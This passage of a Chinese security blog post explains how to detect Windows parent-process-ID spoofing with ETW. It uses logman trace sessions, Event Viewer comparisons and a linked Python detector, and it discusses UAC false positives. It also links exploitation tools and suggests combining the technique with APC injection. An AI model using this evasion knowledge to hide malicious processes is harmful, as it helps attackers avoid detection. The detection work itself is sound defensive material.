这里我们的 ppid 欺骗跟进程有关,所以这里只需要关注`Microsoft-Windows-Kernel-Process` 这个 providers 。可以查一下这个 Providers 更多的信息。 ```bash # 通过 provider 名字查询 logman query providers Microsoft-Windows-Kernel-Process # 通过 GUID 查询 logman query providers "{22FB2CD6-0E7B-422B-A0C7-2FAD1FD0E716}" ```  可以看到,这个 Providers 有一些 Keywords(关键字),代表这个 Providers 可以提供一些进程、线程等事件。对我们的 PPID欺骗来说,只要看进程就行,所以这里选择的关键字是`WINEVENT_KEYWORD_PROCESS`,对应值为`0x10` > 题外话,如果我们想要 `WINEVENT_KEYWORD_PROCESS` 和 `WINEVENT_KEYWORD_THREAD` 怎么办?把它们两的值加起来就行,即(0x10+0x20=`0x30`) ### 3. 创建跟踪会话并指定 Provider 在选定了 Providers 之后,我们需要启动 Tracing session(跟踪会话)了,这里我们给会话起一个名字,叫`ppid-spoofing`,同时指定 Providers 是`Microsoft-Windows-Kernel-Process`,Keywords 是`0x10`,如下: ```bash logman create trace ppid-spoofing -p Microsoft-Windows-Kernel-Process 0x10 -ets ``` 然后可以查一下这个跟踪会话的内容,确保它在运行。 ```bash logman query ppid-spoofing -ets ```  可以看到它正在运行了,同时结果会输出到`C:\ppid-spoofing.etl` ### 4. 分析日志 然后我们用记事本打开桌面上的`新建文本文档.txt`,关掉,然后再运行 ppid欺骗的代码,启动记事本。这一步是为了找出两者在日志中的不同。 > 这玩意加载有点慢。。。最好我们可以再等会。。。等待期间可以随便的打开关闭一些程序。 过一会查看`C:\ppid-spoofing.etl`,发现里面已经有了内容 > 经过我实测,文件大小最好是大于8kb才有数据  然后打开`Event Viewer(事件查看器)`->打开保存的日志  **下图这里一定要选“否”**,不然。。。自己测就知道了。。都是泪。。   然后开始找一下日志,首先找到了,我们直接在桌面打开的记事本的日志。可以看到,`Execution`下的`ProcessID`和`Data`下的`ParentProcessID`是一致的。 > 如果没有日志,可以 事件查看器左边栏 -> 保存的日志 -> ppid-spoofing -> 右键 -> 删除,然后把事件查看器关了,按照上面的操作重新打开。不行就再等等。  然后找到了启动了我们的 ppid 欺骗程序的启动日志,注意,`ppid_spoofing.exe`的 `ProcessID` 是`4632`  然后就是欺骗后的记事本了,可以看到,在`Data`下的`ParentProcessID`是我们在代码指定的 svchost.exe 的PID ,真正的 `ParentProcessID` 应该是`Execution`下的`ProcessID`,这里是`4632`,正好对应着上面的`ppid_spoofing.exe`的 `ProcessID` 。  因此得出结论,`Execution`下的`ProcessID`和`Data`下的`ParentProcessID`的值要一致,否则**可能**是 PPID 欺骗,而且真正的 PPID 应该以`Execution`下的`ProcessID`为准。 为啥说是**可能**呢?<https://blog.f-secure.com/detecting-parent-pid-spoofing/> 这文章中提到,UAC 会欺骗父进程。当 UAC 执行时,实际上是通过 svchost.exe 启动权限提升的进程,启动之后,会把该进程的父进程改成原始调用者。 举个例子,比如我们用管理员权限打开 cmd 的时候,在弹出UAC框之前,cmd 的父进程是 explorer.exe,弹出 UAC 框,问我们要不要用管理员权限的打开,如果我们点了ok之后,svchost.exe 就会启动管理员权限的 cmd.exe ,然后把 cmd.exe 的父进程改成原来的调用者 --- explorer.exe。测试如下图:  ### 5. 终止跟踪会话 分析完后,直接执行如下命令,把跟踪会话关掉即可。 ```bash logman stop ppid-spoofing -ets ```  ### 6. 最终效果 分析了这么多PPID欺骗该如何检测,现在看看效果。 去 <https://github.com/countercept/ppid-spoofing/blob/master/detect-ppid-spoof.py> 拿到大佬写好的检测脚本,直接管理员打开 powershell,然后执行 python 脚本开始监听。然后执行 ppid 欺骗,过一会,就看到 python 脚本提示 notepad.exe 有问题了。 > 先后顺序不能错,是先开启监听日志,然后再发起的攻击。  检测代码也很简单,和刚刚分析的思路一致,即`Execution`下的`ProcessID`和`Data`下的`ParentProcessID`如果不一致,说明可能是PPID欺骗,再排除 UAC 即可。如果是 UAC 的话,会有个服务名字叫`appinfo`,代码中就是根据这个判断是不是 UAC的。 > 实际上不仅仅只有 UAC 会发生PPID欺骗,别的程序也有,这个检测脚本仅仅排除了UAC而已。  0x05 工具 ------- 这里列出别人写好的程序。 ### 利用工具 在 <https://xz.aliyun.com/t/8387> 这里, Al1ex 师傅列了一大堆,我就不献丑了,自取。 ### 检测工具 - Python:<https://github.com/countercept/ppid-spoofing/blob/master/detect-ppid-spoof.py> - C#:<https://www.ired.team/offensive-security/defense-evasion/parent-process-id-ppid-spoofing> 0x06 参考 ------- <https://www.ired.team/offensive-security/defense-evasion/parent-process-id-ppid-spoofing> <https://captmeelo.com/redteam/maldev/2021/11/22/picky-ppid-spoofing.html> <https://blog.f-secure.com/detecting-parent-pid-spoofing/> 0x07 后言 ------- 听过 PPID Spoofing 和 APC 注入更配哦,有机会试试!! 最后感谢大家的阅读,笔者学疏才浅,若有差错,恳请各位斧正。 **都看到这里了,不管你是直接拉到底的,还是看到底的,要不辛苦一下,给点个推荐呗?**
发表于 2022-01-11 09:49:38
阅读 ( 11935 )
分类:
内网渗透
18 推荐
收藏
2 条评论
周星星星星
2022-01-11 19:49
虎哥YYDS
请先
登录
后评论
TuAg
2024-03-25 19:28
tql
请先
登录
后评论
请先
登录
后评论
江南小虫虫
5 篇文章
×
发送私信
请先
登录
后发送私信
×
举报此文章
垃圾广告信息:
广告、推广、测试等内容
违规内容:
色情、暴力、血腥、敏感信息等内容
不友善内容:
人身攻击、挑衅辱骂、恶意行为
其他原因:
请补充说明
举报原因:
×
如果觉得我的文章对您有用,请随意打赏。你的支持将鼓励我继续创作!